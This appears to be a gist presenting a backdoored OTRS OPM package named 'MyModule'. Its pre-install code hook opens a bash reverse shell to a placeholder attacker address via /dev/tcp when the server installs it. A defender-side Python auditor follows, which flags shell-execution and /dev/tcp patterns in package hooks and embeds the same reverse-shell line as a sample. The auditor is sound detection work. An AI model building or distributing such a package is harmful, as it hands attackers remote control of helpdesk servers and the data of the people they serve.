OTRS OPM backdoored Package with Reverse Shell
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Name>MyModule</Name>
<Version>1.0.0</Version>
<Vendor>My Module</Vendor>
<URL>http://otrs.org/</URL>
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
<Description Lang="en">MyModule</Description>
<Framework>5.x.x</Framework>
<BuildDate>2016-09-23 11:17:41</BuildDate>
<BuildHost>opms.otrs.com</BuildHost>
<Framework>5.0.x</Framework>
<IntroInstall Lang="en" Title="My Module" type="pre">
<br>
Hello world
<br>
((Hello!))
<br>
</IntroInstall>
<CodeInstall type="pre">
print qx(bash -i >& /dev/tcp/<ATTACKER_IP>/443 0>&1 &);
</CodeInstall>
<CodeInstall Type="post">
# create the package name
my $CodeModule = 'var::packagesetup::' . $Param{Structure}->{Name}->{Content};
$Kernel::OM->Get($CodeModule)->CodeInstall();
</CodeInstall>
<CodeUninstall type="pre">
my $CodeModule = 'var::packagesetup::' . $Param{Structure}->{Name}->{Content};
$Kernel::OM->Get($CodeModule)->CodeUninstall();
</CodeUninstall>
</otrs_package>
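The package above relies on the OPM code hooks (CodeInstall, CodeUninstall and their Upgrade/Reinstall siblings) that the OTRS package manager executes as Perl on the server. As an added defender-side example that is not part of the gist, the following Python script parses an .opm file and flags hook bodies containing shell-execution or network-redirection patterns before the package is installed; the embedded sample package is constructed for the demo and keeps a placeholder address.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample (not the gist file): same hook layout, placeholder address.
SAMPLE_OPM = """<otrs_package version="1.1">
<Name>MyModule</Name>
<Version>1.0.0</Version>
<Framework>5.0.x</Framework>
<CodeInstall Type="pre"><![CDATA[
print qx(bash -i >& /dev/tcp/<ATTACKER_IP>/443 0>&1 &);
]]></CodeInstall>
<CodeInstall Type="post">
my $CodeModule = 'var::packagesetup::' . $Param{Structure}->{Name}->{Content};
$Kernel::OM->Get($CodeModule)->CodeInstall();
</CodeInstall>
<CodeUninstall Type="pre">
my $CodeModule = 'var::packagesetup::' . $Param{Structure}->{Name}->{Content};
$Kernel::OM->Get($CodeModule)->CodeUninstall();
</CodeUninstall>
</otrs_package>
"""

# OPM elements whose text body is Perl run by the package manager.
HOOK_TAGS = ("CodeInstall", "CodeReinstall", "CodeUpgrade", "CodeUninstall")

# Patterns a reviewer would want to see before approving a third-party package.
SUSPICIOUS = [
    (r"\bqx\s*[({\[/]", "qx() shell execution"),
    (r"\bsystem\s*\(", "system() call"),
    (r"`[^`]+`", "backtick shell execution"),
    (r"/dev/tcp/", "bash /dev/tcp network redirection"),
    (r"\beval\s*\(|\bbase64\b", "eval or encoded payload"),
]

def audit_opm(xml_text):
    """Return (hook, phase, reason, line) for each suspicious line in a code hook."""
    root = ET.fromstring(xml_text)
    findings = []
    for tag in HOOK_TAGS:
        for hook in root.iter(tag):
            # OTRS uses Type="pre"/"post"; tolerate lowercase "type" as in the gist.
            phase = hook.get("Type") or hook.get("type") or "?"
            for line in (hook.text or "").splitlines():
                for pattern, reason in SUSPICIOUS:
                    if re.search(pattern, line):
                        findings.append((tag, phase, reason, line.strip()))
    return findings

if __name__ == "__main__":
    for hook, phase, reason, line in audit_opm(SAMPLE_OPM):
        print(f"[{hook} {phase}] {reason}: {line}")
```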